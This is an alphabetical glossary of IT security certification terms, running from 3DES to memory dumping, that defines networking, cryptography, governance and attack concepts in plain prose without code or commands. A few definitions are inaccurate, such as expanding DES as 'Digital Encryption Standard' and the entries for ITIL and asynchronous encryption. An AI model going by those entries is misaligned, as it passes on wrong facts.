Glossary
3DES See Triple DES.
6 to 4 An IPv4-to-IPv6 transition method that allows IPv6 sites to communicate with each other over the IPv4 network.
802.1x A standard that defines a framework for centralized port-based authentication.
802.11a An 802.11 standard that operates in the 5 GHz frequency band and, by using OFDM, supports speeds up to 54 Mbps.
802.11ac An 802.11 standard that builds on concepts introduced with 802.11n. Although it operates only in the 5.0 GHz frequency, it increases the channel width from 40 MHz to 80 MHz.
802.11b An 802.11 standard that operates in the 2.4 GHz frequency band at speeds up to 11 Mbps.
802.11e An IEEE standard created to provide QoS for packets when they traverse a wireless segment.
802.11f An 802.11 amendment that addressed problems introduced when wireless clients roam from one AP to another, which means the station needs to re-authenticate with the new AP, which in some cases introduced a delay that would break the application connection. This amendment improves the sharing of authentication information between APs.
802.11g An 802.11 standard that operates in the 2.4 GHz frequency band at speeds up to 54 Mbps by using OFDM.
802.11n An 802.11 standard that uses several new concepts to achieve up to 650 Mbps. It does this by using channels that are 40 MHz wide, using multiple antennas, which allow for up to four spatial streams at a time (using a feature called Multiple Input Multiple Output [MIMO]). It can be used in both the 2.4 GHz and 5.0 GHz bands.
acceptability The likelihood that users will accept and follow a system.
acceptance testing Testing which ensures that a system will be accepted by the end users.
access control list (ACL) A list of permissions attached to an object, including files, folders, servers, routers, and so on. Such rule sets can be implemented on firewalls, switches, and other infrastructure devices to control access.
access control policy A defined method for identifying and authenticating users and the level of access that is granted to the users.
access point (AP) A wireless transmitter and receiver that hooks into the wired portion of the network and provides an access point to the network for wireless devices.
accuracy The most important characteristic of biometric systems, which indicates how correct the overall readings will be.
ACL See access control list.
Active Directory (AD) A tool that organizes directories into forests and trees. AD tools are used to manage and organize everything in an organization, including users and devices. This is where security is implemented and its implementation is made more efficient through the use of Group Policy.
active fingerprinting Fingerprinting tools that transmit packets to remote hosts and analyze the replies for clues about the replying system.
ActiveX A Microsoft technology that uses object-oriented programming (OOP) and is based on COM and DCOM.
ad hoc mode An 802.11 mode in which there is no AP, and the stations communicate directly with one another.
administrative control A security control that is implemented to administer an organization’s assets and personnel and includes security policies, procedures, standards, and guidelines that are established by management.
advanced persistent threat (APT) A hacking process that targets a specific entity and is carried out over a long period of time.
advisory security policy A security policy that provides instruction on acceptable and unacceptable activities.
agile model A development model that emphasizes continuous feedback and cross-functional teamwork.
ALE See annualized loss expectancy.
algorithm A mathematical function that encrypts and decrypts data. Also referred to as a cipher.
annualized loss expectancy (ALE) The expected risk factor of an annual threat event. The equation used is ALE = SLE × ARO.
annualized rate of occurrence (ARO) The estimate of how often a given threat might occur annually.
application-level proxy A proxy device that performs deep packet inspection.
APT See advanced persistent threat.
ARO See annualized rate of occurrence.
asset Any object that is of value to an organization. This includes personnel, facilities, devices, and so on.
asset value The estimated value of an asset, used in the calculation of single loss expectancy.
asymmetric encryption An encryption method whereby a key pair, one private key and one public key, performs encryption and decryption. One key performs the encryption, whereas the other key performs the decryption. Also referred to as public key encryption.
asynchronous encryption A type of encryption in which encryption and decryption requests are processed from a queue.
Asynchronous JavaScript and XML (AJAX) A group of interrelated web development techniques used on the client side to create asynchronous web applications.
asynchronous replication A method that provides delayed replication but uses less bandwidth than synchronous replication, can survive higher latency, and is usually used across long distances.
attestation A process that allows changes to a user’s computer to be detected by authorized parties.
attestation identity key (AIK) TPM versatile memory that ensures the integrity of the endorsement key (EK).
AV See asset value.
availability A value that describes what percentage of the time a resource or data is available. The tenet of the CIA triad that ensures that data is accessible when and where it is needed.
authentication The act of validating a user with a unique identifier by providing the appropriate credentials.
authentication header (AH) An IPsec component that provides data integrity, data origin authentication, and protection from replay attacks.
authorization The point after identification and authentication, at which a user is granted the rights and permissions to resources.
BACnet (Building Automation and Control Networks) A protocol used by HVAC systems.
baseline An information security governance component that acts as a reference point that is defined and captured to be used as a future reference. Both security and performance baselines are used.
bastion host A host that may or may not be a firewall. The term actually refers to the position of any device. If it is exposed directly to the Internet or to any untrusted network, we would say it is a bastion host.
benchmark An information security governance component that captures the same data as a baseline and can even be used as a new baseline should the need arise. A benchmark is compared to the baseline to determine whether any security or performance issues exist.
BIA See business impact analysis.
BitLocker A full disk encryption system included with Windows Vista/7 Ultimate and Enterprise, Windows 8/8.1 Pro and Enterprise, and Windows Server 2008 and later.
black-box testing Testing in which the team is provided with no knowledge regarding the organization’s network.
black hat An entity with malicious intent that breaks into an organization’s system(s).
blind test A test in which the testing team is provided with limited knowledge (publicly available information) of the network systems and devices.
block cipher A cipher that performs encryption by breaking a message into fixed length units.
block encryption Encryption of a disk partition, or a file that is acting as a virtual partition. Also sometimes used as a synonym for disk encryption.
Blowfish A block cipher that uses 64-bit data blocks using anywhere from 32- to 448-bit encryption keys. Blowfish performs 16 rounds of transformation.
Bluejacking An attack in which unsolicited messages are sent to a Bluetooth-enabled device, often for the purpose of adding a business card to the victim’s contact list.
Bluesnarfing Unauthorized access to a device using a Bluetooth connection. The attacker tries to access information on the device rather than send messages to the device.
Bluetooth A wireless technology that is used to create personal area networks (PANs) in the 2.4 GHz frequency.
bring your own device (BYOD) An initiative undertaken by many organizations to allow the secure use of personal devices on a corporate network.
browser extensions or add-ons Small programs or scripts that increase the functionality of a website.
brute-force attack A password attack that attempts all possible combinations of numbers and characters.
buffer overflow Behavior that occurs when the amount of data that is submitted is larger than the buffer allocated for it.
build-and-fix approach A method of developing software as quickly as possible and releasing it right away. This method, which was used in the past, has been largely discredited and is now used as a template for how not to manage a development project.
Build Security In (BSI) An initiative that promotes a process-agnostic approach that makes security recommendations with regard to architectures, testing methods, code reviews, and management processes.
business impact analysis (BIA) A functional analysis that occurs as part of business continuity and disaster recovery and lists the critical and necessary business functions, their resource dependencies, and their level of criticality to the overall organization.
business partnership agreement (BPA) An agreement between two business partners that establishes the conditions of the partner relationship.
BYOD See bring your own device.
CA See certification authority.
Capability Maturity Model Integration (CMMI) A process improvement approach that addresses three areas of interest: product and service development (CMMI for development), service establishment and management (CMMI for services), and product service and acquisition (CMMI for acquisitions).
CAST-128 A block cipher that uses a 40- to 128-bit key that will perform 12 or 16 rounds of transformation on 64-bit blocks.
CAST-256 A block cipher that uses a 128-, 160-, 192-, 224-, or 256-bit key that will perform 48 rounds of transformation on 128-bit blocks.
CBC See cipher block chaining.
CBC-MAC See cipher block chaining MAC.
CEO See chief executive officer.
CERT See Computer Emergency Response Team.
certificate revocation list (CRL) A list of digital certificates that a CA has revoked.
certification authority (CA) An entity that creates and signs digital certificates, maintains the certificates, and revokes them when necessary.
CFB See cipher feedback.
CFO See chief financial officer.
chain of custody A series of documents that shows who controlled the evidence, who secured the evidence, and who obtained the evidence.
Challenge Handshake Authentication Protocol (CHAP) An authentication protocol that solves the clear-text problem by operating without sending the credentials across the link.
checksum See hash.
chief executive officer (CEO) The highest managing officer in an organization, who reports directly to the shareholders.
chief financial officer (CFO) The officer responsible for all financial aspects of an organization.
chief information officer (CIO) The officer responsible for all information systems and technology used in the organization and who reports directly to the CEO or CFO.
chief privacy officer (CPO) The officer responsible for private information, who usually reports directly to the CIO.
chief security officer (CSO) The officer who leads any security effort and reports directly to the CEO.
CIA triad The three goals of security, that is, confidentiality, integrity and availability.
CIO See chief information officer.
cipher See algorithm.
cipher block chaining (CBC) A DES mode in which each 64-bit block is chained together because each resultant 64-bit ciphertext block is applied to the next block. So plaintext message block 1 is processed by the algorithm using an initialization vector (IV). The resultant ciphertext message block 1 is XORed with plaintext message block 2, resulting in ciphertext message 2. This process continues until the message is complete.
cipher block chaining MAC (CBC-MAC) A block-cipher MAC that operates in CBC mode.
cipher feedback (CFB) A DES mode that works with 8-bit (or smaller) blocks and uses a combination of stream ciphering and block ciphering. As with CBC, the first 8-bit block of the plaintext message is XORed by the algorithm using a keystream, which is the result of an IV and the key. The resultant ciphertext message is applied to the next plaintext message block.
ciphertext An altered form of a message that is unreadable without knowing the key and the encryption system used. Also referred to as a cryptogram.
circuit-level proxies Proxies that operate at the session layer (layer 5) of the OSI model.
clandestine Information hidden from certain individuals or groups, perhaps while being shared with other individuals.
cleanroom model A development model that strictly adheres to formal steps and a more structured method. It attempts to prevent errors and mistakes through extensive testing.
cleartext See plaintext.
click-jacking An attack that crafts a transparent page or frame over a legitimate-looking page that entices the user to click on something. When he does, he is really clicking on a different URL. In some cases, the attacker may entice the user to enter credentials that the attacker can use later.
client-based application virtualization Virtualization in which the target application is packaged and streamed to the client.
client-side attack An attack that targets vulnerabilities in a client’s applications that work with the server. It can occur only if the client makes a successful connection with the server.
clipping level A configured baseline threshold above which violations will be recorded.
cloud antivirus products Antivirus software that does not run on a local computer but that runs in the cloud, creating a smaller footprint on the client.
cloud-based collaboration A means of collaboration used by enterprises and small teams for storing documents, communicating, and sharing updates on projects.
cloud computing Computing in which resources are available in a web-based data center so the resources can be accessed from anywhere.
cloud storage Storage in which the data is located on a central server and is accessible from anywhere and, in many cases, from a variety of device types.
clustering Providing load-balancing services by using multiple servers running the same application and data set.
CobiT See Control Objectives for Information and Related Technology.
Code Division Multiple Access (CDMA) A transmission sharing process that assigns a unique code to each call or transmission and spreads the data across the spectrum, allowing a call to make use of all frequencies.
code review The systematic investigation of code for security and functional problems.
cognitive password A password type that is a piece of information that can be used to verify an individual’s identity. This information is provided to the system by answering a series of questions based on the user’s life, such as favorite color, pet’s name, mother’s maiden name, and so on.
collision An event that occurs when a hash function produces the same hash value on different messages.
collusion Occurs when two employees work together to accomplish a theft of some sort that could not be accomplished without their combined knowledge or responsibilities.
combination password A password type that uses a mix of dictionary words, usually two unrelated words.
commissioning The process of implementing an asset on an enterprise network.
Committee of Sponsoring Organizations (COSO) of the Treadway Commission Framework A corporate governance framework that consists of five interrelated components: control environment, risk assessment, control activities, information and communication, and monitoring.
Common Internet File System (CIFS) A method for accessing data in Windows networks. CIFS is a public version of Server Message Block (SMB) that was invented by Microsoft.
community cloud A cloud computing model where the cloud infrastructure is shared among several organizations from a specific group with common computing needs.
compensative control A security control that substitutes for a primary access control and mainly acts as a mitigation to risks.
complex password A password type that forces a user to include a mixture of upper- and lowercase letters, numbers, and special characters.
Computer Emergency Response Team (CERT) An organization that studies security vulnerabilities and provides assistance to organizations that become victims of attacks. Part of the Software Engineering Institute of the Carnegie Mellon University at Pittsburgh (PA), it offers 24-hour emergency response service and shares information for improving web security.
computer surveillance Capture and reporting of a person’s actions using digital information, such as audit logs.
Configuration Lockdown A setting that can be configured on a variety of devices once the device is correctly configured. It prevents any changes to the configuration.
concealment cipher A cipher that intersperses plaintext somewhere within other written material. Also referred to as a null cipher.
confidentiality The tenet of the CIA triad which ensures that data is protected from unauthorized disclosure.
confusion The process of changing a key value during each round of encryption. Confusion is often carried out by substitution.
container-based virtualization A type of server virtualization in which the kernel allows for multiple isolated user-space instances. Also called operating system virtualization.
content analysis Analysis of the contents of a drive or software. Drive content analysis gives a report detailing the types of data by percentage. Software content analysis determines the purpose of the software.
continuity of operations plan (COOP) A business continuity document that considers all aspects that are affected by a disaster, including functions, systems, personnel, and facilities and that lists and prioritizes the services that are needed, particularly the telecommunications and IT functions.
Control Objectives for Information and Related Technology (CobiT) A security controls development framework that uses a process model to subdivide IT into four domains: Plan and Organize (PO), Acquire and Implement (AI), Deliver and Support (DS), and Monitor and Evaluate (ME).
control plane A component of a router that carries signaling traffic originating from or destined for a router. This is the information that allows the routers to share information and build routing tables.
cookies Text files that are stored on a user’s hard drive or memory. These files store information about the user’s Internet habits, including browsing and spending information.
copy backup A backup that backs up all the files, much like a full backup, but does not reset the file’s archive bit.
corrective control A security control that reduces the effect of an attack or other undesirable event.
cost/benefit analysis A type of analysis that compares the costs of deploying a particular solution to the benefits that will be gained from its deployment. See also return on investment and total cost of ownership.
countermeasure A control that is implemented to reduce potential risk.
counter mode A DES mode similar to OFB mode that uses an incrementing IV counter to ensure that each block is encrypted with a unique keystream. Also, the ciphertext is not chaining into the encryption process. Because this chaining does not occur, CTR performance is much better than the other modes.
CPO See chief privacy officer.
CRL See certificate revocation list.
cross-certification Certification topology that establishes trust relationships between CAs so that the participating CAs can rely on the other participants’ digital certificates and public keys.
crossover error rate (CER) The point at which FRR equals FAR. Expressed as a percentage, this is the most important metric.
cross-site request forgery (CSRF) An attack that causes an end user to execute unwanted actions on a web application in which he or she is currently authenticated.
cross-site scripting (XSS) A web attack that can cause text to be rendered on the page or a script to be executed.
cryptography A science that either hides data or makes data unreadable by transforming it.
cryptosystem The entire cryptographic process, including the algorithm, key, and key management functions. The security of a cryptosystem is measured by the size of the keyspace and available computational power.
CSO See chief security officer.
CTR See counter mode.
daily backup A backup in which a file’s timestamp is used to determine whether it needs to be archived.
data aggregation A process that allows data from the multiple resources to be queried and compiled together into a summary report.
data archiving The process of identifying old or inactive data and relocating it to specialized long-term archival storage systems.
data clearing A process that renders information unrecoverable by a keyboard. This attack extracts information from data storage media by executing software utilities, keystrokes, or other system resources executed from a keyboard.
data breach An incident in which information that is considered private or confidential is released to unauthorized parties.
data interfaces Network interfaces used to pass regular data traffic and not used for either local or remote management.
data isolation In terms of databases, preventing data from being corrupted by two concurrent operations. In terms of cloud computing, ensuring that tenant data in a multi-tenant solution is isolated from other tenants’ data, using a tenant ID in the data labels.
data leakage A leak that occurs when sensitive data is disclosed to unauthorized personnel either intentionally or inadvertently.
data loss prevention (DLP) software Software that attempts to prevent disclosure of sensitive data.
data plane The plane on a networking device such as a router or switch that carries user traffic. Also known as the forwarding plane.
data purging Using a method such as degaussing to make old data unavailable even with forensics. Purging renders information unrecoverable against laboratory attacks (forensics).
data remnant The residual information left on a drive after a delete process or the data left in terminated virtual machines.
data retention policy A security policy that stipulates how long data is retained by the organization, based on the data type.
data warehousing The process of combining data from multiple databases or data sources in a central location called a warehouse.
database access monitors (DAMs) Devices that monitor transactions and the activity of database services.
database administrator A person who is responsible for managing organizational databases that store valuable information, including financial, personnel, inventory, and customer information.
de facto standards Standards that are widely accepted but are not formally adopted.
de jure standards Standards that are based on laws or regulations and are adopted by international standards organizations.
decommissioning The process of retiring an asset from use on an enterprise network.
decryption The process of converting data from ciphertext to plaintext. Also referred to as deciphering.
deduplication A process provided by many storage solutions of searching through data and removing redundant copies of the same file.
definition files The files that make it possible for software to identify the latest viruses.
degaussing The act of exposing media to a powerful, alternating magnetic field.
demilitarized zone (DMZ) a perimeter network where resources are exposed to the Internet while being logically separated from the internal network.
Department of Defense Architecture Framework (DoDAF) An architecture framework that divides information into seven viewpoints: Strategic Viewpoint (StV), Operational Viewpoint (OV), Service-Oriented Viewpoint (SOV), Systems Viewpoint (SV), Acquisition Viewpoint (AcV), Technical Viewpoint (TV), and All Viewpoint (AV).
deperimitirization Changing the network boundary to include devices normally considered to be outside the networks perimeter.
DES See Digital Encryption Standard.
DES-X A variant of DES that uses multiple 64-bit keys in addition to the 56-bit DES key. The first 64-bit key is XORed to the plaintext, which is then encrypted with DES. The second 64-bit key is XORed to the resulting cipher.
desktop sharing Describes a group of related technologies that allow for both remote login to a computer and real-time collaboration on the desktop of a remote user.
detective control A security control that detects an attack while it is occurring to alert appropriate personnel.
deterrent control A security control that deters potential attacks.
dictionary attack An attack in which the attackers use a dictionary of common words to discover passwords.
differential backup A backup in which all files that have been changed since the last full backup are backed up, and the archive bit for each file is not cleared.
diffusion The process of changing the location of the plaintext within the ciphertext. Diffusion is often carried out using transposition.
digital certificate An electronic document that identifies the certificate holder.
Digital Encryption Standard (DES) A symmetric algorithm that uses a 64-bit key, 8 bits of which are used for parity. The effective key length for DES is 56 bits. DES divides the message into 64-bit blocks. Sixteen rounds of transposition and substitution are performed on each block, resulting in a 64-bit block of ciphertext.
digital rights management (DRM) An access control method used by hardware manufacturers, publishers, copyright holders, and individuals to control the use of digital content.
digital signature A method of providing sender authentication and message integrity. The message acts as an input to a hash function, and the sender’s private key encrypts the hash value. The receiver can perform a hash computation on the received message to determine the validity of the message.
directive control A security control that specifies an acceptable practice in an organization.
Digital Signature Standard (DSS) A federal digital security standard that governs the Digital Security Algorithm (DSA).
Direct Sequence Spread Spectrum (DSSS) One of two technologies (along with FHSS) that were a part of the original 802.11 standard. DSSS is the modulation technique used in 802.11b.
disk imaging A drive duplication process that creates an exact image of the contents of a hard drive.
disk-level encryption Encryption of an entire volume or an entire disk, which may use the same key for the entire disk or in some cases a different key for each partition or volume.
double-blind test A blind test in which the organization’s security team does not know that an attack is coming.
Double-DES A DES version that uses a 112-bit key length.
downstream liability Liability that an organization accrues due to partnerships with other organizations and customers.
DRM See digital rights management.
DSS See Digital Signature Standard.
dual-homed firewall A firewall that has two network interfaces, one pointing to the internal network and another connected to an untrusted network.
Dual Stack An IPv4-to-IPv6 transition method that runs both IPv4 and IPv6 on networking devices.
due care Actions exhibited when an organization takes all the actions it can reasonably take to prevent security issues or to mitigate damage if security breaches occur.
due diligence Actions which ensure that an organization understands the security risks it faces.
dumpster diving Examining garbage contents to obtain confidential information, including personnel information, account login information, network diagrams, and organizational financial data.
dynamic disk pools Disk technology that uses an algorithm to define which drives are used and distributes data and capacity accordingly.
ECB See electronic code book.
e-discovery Recovering evidence from electronic devices.
EF See exposure factor.
EFS See Encrypting File System.
electronic code book (ECB) A version of DES in which 64-bit blocks of data are processed by the algorithm using the key. The ciphertext produced can be padded to ensure that the result is a 64-bit block.
email spoofing The process of sending an email that appears to come from one source when it really comes from another.
emergency response team A team that is composed of organizational personnel who are responsible for handling any emergencies that occur.
Encapsulating Security Payload (ESP) An IPsec component that provides data integrity, data origin authentication, protection from replay attacks, and data confidentiality.
Encrypting File System (EFS) A file system included in most versions of Windows that provides encryption.
encryption The process of converting data from plaintext to ciphertext. Also referred to as enciphering.
endorsement key (EK) TPM persistent memory installed by the manufacturer that contains a public/private key pair.
enrollment time The process of obtaining the sample that is used by a biometric system.
entropy The randomness collected by an application that is used in cryptography or other uses that require random data, which is often collected from hardware sources.
exploitation tools Tools used to exploit security holes.
exposure factor (EF) The percent value or functionality of an asset that will be lost when a threat event occurs.
external actor A threat actor that comes from outside the organization.
Extensible Access Control Markup Language (XACML) A standard for an access control policy language using XML.
Extensible Authentication Protocol (EAP) A framework (rather than a single protocol) for port-based access control that uses the same three components used in RADIUS.
Extensible Messaging and Presence Protocol (XMPP) A secure protocol that can be used to provide presence information.
facial scan A scan that records facial characteristics, including bone structure, eye width, and forehead size.
facilities manager A person who ensures that all organizational buildings are maintained, including building maintenance and custodial services.
failover The capacity of a system to switch over to a backup system if a failure occurs in the primary system.
failsoft The capability of a system to terminate noncritical processes when a failure occurs.
false acceptance rate (FAR) A measurement of the percentage of invalid users that will be falsely accepted by the system. This is called a Type II error. Type II errors are more dangerous than Type I errors.
false rejection rate (FRR) A measurement of valid users that will be falsely rejected by the system. This is called a Type I error.
feature extraction An approach to obtaining biometric information from a collected sample of a user’s physiological or behavioral characteristics.
federated identity A portable identity that can be used across businesses and domains.
Fiber Channel over Ethernet (FCoE) A technology that encapsulates Fiber channel traffic within Ethernet frames much like iSCSI encapsulates SCSI commands in IP packets.
file-level encryption Encryption performed per file, where each file owner has a key.
fingerprint scan A scan that records the ridges of a finger for matching.
fingerprinting Using tools to scan a network, identify hosts, and identify services and applications available on those hosts.
finger scan A scan that extracts only certain features from a fingerprint.
Federal Information Processing Standard (FIPS) 199 A U.S. government standard for categorizing information assets for confidentiality, integrity, and availability.
Flash A multimedia and software platform used for creating vector graphics, animation, games, and rich Internet applications.
formal code review An extremely thorough, line–by-line code inspection, usually performed by multiple participants using multiple phases.
Frequency Division Multiple Access (FDMA) One of the modulation techniques used in cellular wireless networks. It divides the frequency range into bands and assigns a band to each subscriber. FDMA was used in 1G cellular networks.
Frequency Hopping Spread Spectrum (FHSS) One of two technologies (along with DSSS) that were a part of the original 802.11 standard. It is unique in that it changes frequencies or channels every few seconds in a set pattern that both transmitter and receiver know.
FTPS FTP that adds support for Transport Layer Security (TLS) and the Secure Sockets Layer (SSL) cryptographic protocol.
full backup A backup in which all data is backed up, and the archive bit for each file is cleared.
full-knowledge test A test in which the testing team is provided with all available knowledge regarding the organization’s network.
fuzz testing methods (fuzzing) A testing method that injects invalid or unexpected input (sometimes called faults) into an application to test how the application reacts.
fuzzers Software tools that find and exploit weaknesses in web applications.
geo-fencing A technology that uses GPS to define geographic boundaries.
geo-location A technology that allows location and time information about an asset to be tracked, provided that the appropriate feature is enabled on the device.
geotagging The process of adding geographical identification metadata to various media.
Global System for Mobile Communications (GSM) A type of cell phone that contains a Subscriber Identity Module (SIM) chip. These chips contain all the information about the subscriber and must be present in the phone for it to function.
GPS location A technology that allows location and time information about an asset to be tracked, provided that the appropriate feature is enabled on the device.
graphical passwords Passwords that use graphics as part of the authentication mechanism. Also called CAPTCHA passwords.
gray box testing Testing in which the team is provided more information than is provided in black box testing, while not as much as is provided in white box testing.
gray hat An entity that breaks into an organization’s system(s) that is considered somewhere between white hat and black hat. A gray hat breaks into a system, notifies the administrator of the security hole, and offers to fix the security issues for a fee.
GRE tunnels An IPv4–to-IPv6 transition method that can be used to carry IPv6 packets across an IPv4 network by encapsulating them in GRE IPv4 packets.
guideline An information security governance component that gives recommended actions that are much more flexible than standards, thereby providing allowance for circumstances that can occur.
hacktivist A person who uses the same tools and techniques as a hacker but does so to disrupt services and bring attention to a political or social cause.
hand geometry scan A scan that obtains size, shape, or other layout attributes of a user’s hand and can also measure bone length or finger length.
hand topography scan A scan that records the peaks and valleys of a user’s hand and its shape.
hardware security module (HSM) An appliance that safeguards and manages digital keys used with strong authentication and provides crypto processing.
hash A one-way function that reduces a message to a hash value. If the sender’s hash value is compared to the receiver’s hash value, message integrity is determined. If the resultant hash values are different, then the message has been altered in some way, provided that both the sender and receiver used the same hash function.
hash MAC A keyed-hash MAC that involves a hash function with a symmetric key.
hash matching A process that involves spoofing hashes, leading to access to arbitrary pieces of other customers’ data.
HAVAL A one-way function that produces variable-length hash values, including 128 bits, 160 bits, 192 bits, 224 bits, and 256 bits and uses 1,024-bit blocks.
HBA allocation The process of confining certain ports on the host bus adapter (HBA) to certain zones for security.
hierarchical storage management (HSM) system A type of backup management system that provides a continuous online backup by using optical or tape “jukeboxes.”
HMAC See hash MAC.
host-based firewall A firewall that resides on a single host and is designed to protect that host only.
host-based IDS A system that monitors traffic on a single system. Its primary responsibility is to protect the system on which it is installed.
host bus adapter (HBA) A card in a server that accesses a storage network and performs any necessary translations between the protocols in use.
hot site A leased facility that contains all the resources needed for full operation.
HSM See hierarchical storage management system.
HTML (Hypertext Markup Language) 5 The latest version of the markup language that has been used on the Internet for years. It has been improved to support the latest multimedia (which is why it is considered a likely successor to Flash).
HTTP interceptors software that intercepts web traffic between a browser and a website. They permit actions that the browser would not permit for testing purposes.
HTTPS See Hypertext Transfer Protocol Secure.
HTTP-Secure See Hypertext Transfer Protocol Secure.
hybrid cloud A cloud computing model in which the organization provides and manages some resources in-house and has others provided externally via a public cloud. It is some combination of a private and public cloud.
Hypertext Transfer Protocol Secure (HTTPS or HTTP-Secure) security protocol that layers HTTP on top of the TLS/SSL protocol, thus adding the security capabilities of TLS/SSL to standard HTTP.
hypervisor A software component that manages the distribution of resources (CPU, memory, and disk) to virtual machines.
IA See interoperability agreement.
IDEA See International Data Encryption Algorithm.
identity propagation The passing or sharing of a user’s or device’s authenticated identity information from one part of a multitier system to another.
identity theft A situation in which someone obtains someone else’s personal information, including driver’s license number, bank account number, and Social Security number, and uses that information to assume the identity of the individual whose information was stolen.
IDS See intrusion detection system.
imprecise methods DLP methods that can include keywords, lexicons, regular expressions, extended regular expressions, meta data tags, Bayesian analysis, and statistical analysis.
incremental backup A backup in which all files that have been changed since the last full or incremental backup are backed up, and the archive bit for each file is cleared.
incremental model A refinement to the basic waterfall model which states that software should be developed in increments of functional capability.
informative security policy A security policy that provides information on certain topics and acts as an educational tool.
Information Technology Infrastructure Library (ITIL) A process management development standard developed by the Office of Management and Budget in OMB Circular A-130.
infrared A short-distance wireless process that uses light—in this case infrared light—rather than radio waves. It is used for short connections between devices that each have an infrared port. It operates up to 5 meters at speeds up to 4 Mbps and requires a direct line of sight between the devices.
Infrastructure as a Service (IaaS) A cloud computing model in which the vendor provides the hardware platform or data center and the company installs and manages its own operating systems and application systems. The vendor simply provides access to the data center and maintains that access.
infrastructure mode An 802.11 WLAN mode in which all transmissions between stations go through the AP, and no direct communication between stations occurs.
inherent risk Risk that is virtually impossible to avoid.
inline network encryptor (INE) A type 1 encryption device.
input validation The process of checking all input for things such as proper format and proper length.
insecure direct object reference flaw An attack that can come from an authorized user who is accessing information to which he should not have access.
instant messaging A service often integrated with messaging software that allows real-time text and video communication.
integer overflow Behavior that occurs when an arithmetic operation attempts to create a numeric value that is too large to be represented within the available storage space.
integrity A characteristic provided if you can be assured that the data has not changed in any way. The tenet of the CIA triad that ensures that data is accurate and reliable.
Integrity Measurement Architecture (IMA) A kernel integrity subsystem that can be used to attest to a system’s runtime integrity.
interconnection security agreement (ISA) An agreement between two organizations that own and operate connected IT systems to document the technical requirements of the interconnection.
internal actor A threat actor that comes from within an organization.
International Data Encryption Algorithm (IDEA) A block cipher that uses 64-bit blocks, which are divided into 16 smaller blocks. It uses a 128-bit key and performs eight rounds of transformations on each of the 16 smaller blocks.
Internet Key Exchange (IKE) A protocol that provides the authentication material used to create the keys exchanged by ISAKMP during peer authentication in IPsec. Also sometimes referred to as IPsec Key Exchange.
Internet Protocol Security (IPsec) A suite of protocols that establishes a secure channel between two devices. IPsec can provide encryption, data integrity, and system-based authentication, which makes it a flexible option for protecting transmissions.
Internet Security Association and Key Management Protocol (ISAKMP) An IPsec component that handles the creation of a security association for a session and the exchange of keys.
Internet Small Computer System Interface (iSCSI) A standard method of encapsulating SCSI commands (which are used with storage area networks) within IP packets.
interoperability agreement (IA) An agreement between two or more organizations to work together to allow information exchange.
intrusion detection system (IDS) A system responsible for detecting unauthorized access or attacks against systems and networks.
intrusion protection system (IPS) A system responsible for preventing attacks. When an attack begins, an IPS takes actions to prevent and contain the attack.
IPsec See Internet Protocol Security.
IPv6 An IP addressing scheme designed to provide a virtually unlimited number of IP addresses. It uses 128 bits rather than 32, as in IPv4, and it is represented in hexadecimal rather than dotted-decimal format.
iris scan A scan of the colored portion of the eye, including all rifts, coronas, and furrows.
ISAKMP See Internet Security Association and Key Management Protocol.
iSCSI See Internet Small Computer System Interface.
ISO 27000 A security program development standard on how to develop and maintain an information security management system (ISMS). These standards provide guidance to organizations in integrating security into the development and maintenance of software applications. The series establishes information security standards published jointly by the International Organization for Standardization (ISO) and the International Electrotechnical Commission (IEC). Also known as ISO/IEC 27000.
issue-specific security policy A security policy that addresses specific security issues.
ITIL See Information Technology Infrastructure Library.
JAD See joint analysis (or application) development model.
Java applet A small component created using Java that runs in a web browser. It is platform independent and creates intermediate code called byte code that is not processor specific.
JavaScript A dynamic computer programming language commonly used as part of web browsers to allow the use of client-side scripts
JavaScript Object Notation (JSON) A simple text-based message format that is often used with RESTful web services.
job rotation A security measure which ensures that more than one person fulfills the job tasks of a single position within an organization. It involves training multiple users to perform the duties of a position to help prevent fraud by any individual employee.
joint analysis (or application) development model (JAD) A development model that uses a team approach. It uses workshops to both agree on requirements and to resolve differences.
JSON See JavaScript Object Notation.
kernel proxy firewall A fifth-generation firewall that inspects a packet at every layer of the OSI model but does not introduce the performance hit of an application-layer firewall because it does this at the kernel layer.
Kerberos A ticket-based authentication and authorization system used in UNIX and Active Directory.
key A parameter that controls the transformation of plaintext into ciphertext or vice versa. Determining the original plaintext data without the key is impossible. Also referred to as a cryptovariable.
keystroke dynamics A biometric authentication technique that measures a user’s typing pattern when inputting a password or other predetermined phrase.
Layer 2 Tunneling Protocol (L2TP) A tunneling protocol that operates at layer 2 of the OSI model. Like PPTP, it can use various authentication mechanisms, but it does not provide any encryption.
LDAP See Lightweight Directory Access Protocol.
legacy systems Old technologies, computers, or applications that are considered outdated but provide a critical function in the enterprise.
lightweight code review A cursory code inspection, usually done as a normal part of the development process.
Lightweight Directory Access Protocol (LDAP) A common directory service standard that is based on the earlier standard X.500.
likelihood A probability or chance of a risk occurring.
latency The delay typically incurred in the processing of network data.
least privilege A security principle which requires that a user or process be given only the minimum access privilege needed to perform a particular task.
live migration A system’s migration of a VM from one host to another when needed.
load balancing A computer method for distributing workload across multiple computing resources.
logical control A software or hardware component used to restrict access. See also technical control.
logical deployment diagram A diagram that shows the architecture, including the domain architecture, including the existing domain hierarchy, names, and addressing scheme; server roles; and trust relationships.
logical unit number (LUN) A number that identifies a section of data storage.
LUN masking or mapping The process of controlling access to a LUN by effectively “hiding” its existence from those who should not have access.
maintainability How often a security solution or device must be updated and how long the updates take.
malware sandboxing The process of confining malware to a protected environment until it can be studied, understood, and mitigated.
management controls Controls implemented to administer an organization’s assets and personnel and include security policies, procedures, standards, baselines, and guidelines that are established by management. See also administrative control.
management interface An interface that is used to access a device over a network, using utilities such as SSH and Telnet.
management plane The component or plane on a networking device such as a router or switch that is used to administer the device.
maximum tolerable downtime (MTD) The maximum amount of time that an organization can tolerate a single resource or function being down.
MD2 A message digest algorithm that produces a 128-bit hash value and performs 18 rounds of computations.
MD4 A message digest algorithm that produces a 128-bit hash value and performs only 3 rounds of computations.
MD5 A message digest algorithm that produces a 128-bit hash value and performs 4 rounds of computations.
MD6 A message digest algorithm that produces a variable hash value, performing a variable number of computations.
mean time between failures (MTBF) The estimated amount of time a device will operate before a failure occurs. Describes how often a component fails, on average.
mean time to repair (MTTR) The average time required to repair a single resource or function when a disaster or other disruption occurs. Describes the average amount of time it takes to get a device fixed and back online.
Measured Boot (launch) A detailed, reliable log created by antimalware software of components that loaded prior to the antimalware driver during startup. This log can be used by antimalware software or an administrator in a business environment to validate whether there may be malware on the computer or evidence of tampering with boot components.
memorandum of understanding (MOU) An agreement between two or more organizations that details a common line of action.
memory dumping Retrieving all information contained in memory.
